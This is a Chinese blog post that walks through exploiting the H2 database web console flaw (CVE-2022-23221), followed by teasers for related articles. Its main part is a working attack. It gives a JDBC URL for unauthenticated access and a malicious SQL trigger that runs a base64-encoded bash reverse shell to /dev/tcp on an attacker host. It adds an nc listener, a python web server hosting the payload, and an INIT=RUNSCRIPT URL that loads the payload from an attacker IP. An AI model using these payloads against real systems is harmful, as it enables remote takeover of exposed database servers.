数据库应用-H2database--未授权访问&命令执行漏洞

已于 2023-11-26 00:16:13 修改
阅读量628 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全
于 2023-11-26 00:13:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXokok/article/details/134622830
版权

数据库应用-H2database–未授权访问&命令执行漏洞

Java SQL 数据库 H2,H2的主要特点是:非常快,开源,JDBC API;嵌入式和服务器模式;内存数据库;基于浏览器的控制台应用程序。

H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在v2.1.210+中修复。2.1.210 之前的H2控制台允许远程攻击者通过包含子字符串的jdbc:h2:mem JDBC URL执行任意代码。

1、未授权访问:

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\

将上面这条代码复制到 JDBC URL中

image

直接点击连接即可,未授权进入数据库

image

2、命令执行漏洞:

在攻击机上创建一个数据库文件:h2database.sql

这个sql文件内容需要自己修改

反弹shell命令示例:bash -i >& /dev/tcp/x.x.x.x/6666 0>&1 (这个IP写你shell要反弹到哪台主机上的那个主机的IP)

CREATE TABLE test (

     id INT NOT NULL

 );

CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript

Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,把反弹shell的命令base64编码过后放在这里}|{base64,-d}|{bash,-i}");';

​​1700927451238​​

在攻击机上监听端口 nc -lvvp xxxx (这个端口要看你刚才反弹shell时对应的端口)

image

启动提供SQL文件远程加载服务

利用以下命令快速提供一个web服务,这条命令会把当前目录下的所有内容共享出去,那么你需要到刚才创建sql文件的目录下执行下面这条命令

python3 -m http.server 端口

image

填入Payload使其加载远程SQL

下面这条命令的后面需要修改一下你自己攻击机的IP和端口

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://192.168.91.129:89/h2database.sql';\

然后把命令写入到 JDBC URL中点击连接即可

image

返回监听的主机上 看到拿到了反弹过来的shell,命令执行成功

image

H2db console 授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 3129
H2 数据库控制台中的另一个经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
【实战系列4】H2 Database Console授权访问/命令执行漏洞到msf内网提权渗透
04-13 1451
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
【第78课】数据库安全&Redis&CouchDB&H2database&授权访问&CVE漏洞
最新发布
Lucker_YYY的博客
08-24 914
免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
H2 Database Console授权访问漏洞复现+利用
0xSec
04-08 1956
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令
H2database 授权访问 vulhub
c0529的博客
06-12 449
打开之后是一个访问的页面,我们需要用java语言驱动让这个网站主动访问其他主机并且执行命令,我们需要用到一开始写在最前面的工具进行生成rmi。我出现的一个问题就是反弹不出去,我想了想可能是要在我的外网上面java生成命令才对,但是等我反应过来,我已经把容器关掉了。在驱动选择:javax.naming.InitialContext。被反弹shell的机子:可以就用kali,或者配一台外网服务器。出现下方红色的字体就成功了,同时你的主机检测到了这个网站的访问。虚拟机:kali+docker。
服务攻防-数据库安全&Redis&CouchDB&H2database&授权访问&CVE漏洞
siu~
01-23 1365
1、数据库-Redis-授权RCE&CVE 2、数据库-Couchdb-授权RCE&CVE 3、数据库-H2database-授权RCE&CVE 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2、安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
H2database-授权访问漏洞复现
weixin_45366453的博客
06-29 3051
H2 database是一款Java内存数据库,多用于单元测试。默认端口:20051H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令执行如下命令启动一个Springboot + h2database环境:启动后,访问即可查看到H2 database的管理页面。下载JNDI-Injection-Exploithttps://github.co
H2 Database Console 授权访问复现
玄道的网安博客
01-22 2311
漏洞概述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装...
从JDBC到h2 database任意命令执行1
08-03
【文章摘要】本文主要探讨了JDBC在数据库连接中的应用及其潜在的安全风险,并聚焦于h2 database的相关漏洞,特别是h2 database console的授权访问问题。作者通过实例演示如何启动h2 database console,并提醒读者...
H2 Database Console 授权访问
黑白的博客
12-20 4244
声明 好好学习,天天向上 漏洞描述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 影响范围 Spring Boot
H2 Database Console授权访问漏洞封堵
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
07-05 388
H2 Database Console授权访问,默认情况下自动创建不存在的数据库,从而导致授权访问。网络上能搜到各种授权访问的教程,但是它怎么封堵呢?
H2 Database Console授权访问
zzzzz1284的博客
01-06 1073
H2 Database Console授权访问
漏洞复现Influxdb,H2database,couchDB,ElasticSearch
m0_63917373的博客
11-30 1566
漏洞复现Influxdb,H2database,couchDB,ElasticSearch vulhub vulfocus
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2904
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞复现
rumil的博客
10-14 1077
Apache CouchDB是一个开源的面向文档的NoSQL数据库,用Erlang实现。它使用JSON来存储数据,使用MapReduce使用JavaScript作为查询语言,使用HTTP作为API。在用户开启了认证, 但设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可 以伪造任意用户身份在 influxdb 中执行 SQL 语句。利用这个管理页面,我们可以进行 JNDI 注入攻击,进而在目标环境下执行任意命令。将生成出来的所提供的服务,输入到界面当中,进行连接。
vulhub漏洞复现24_H2 Database
weixin_44193247的博客
02-01 1380
vulhub漏洞复现练习篇
HBase0.94在flush操作时候的一个漏洞
云计算、分布式架构、K8S、大数据、机器学习、搜索、推荐、广告
12-16 2503
基于HBase0.94版本,在高并发写操作时,运行时偶尔出现丢失数据的情况,查看了HBase的日志,出现一下信息,WARN org.apache.hadoop.hbase.regionserver.MemStore: Snapshot called again without clearing previous. Doing nothing. Another ongoing flush or di
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值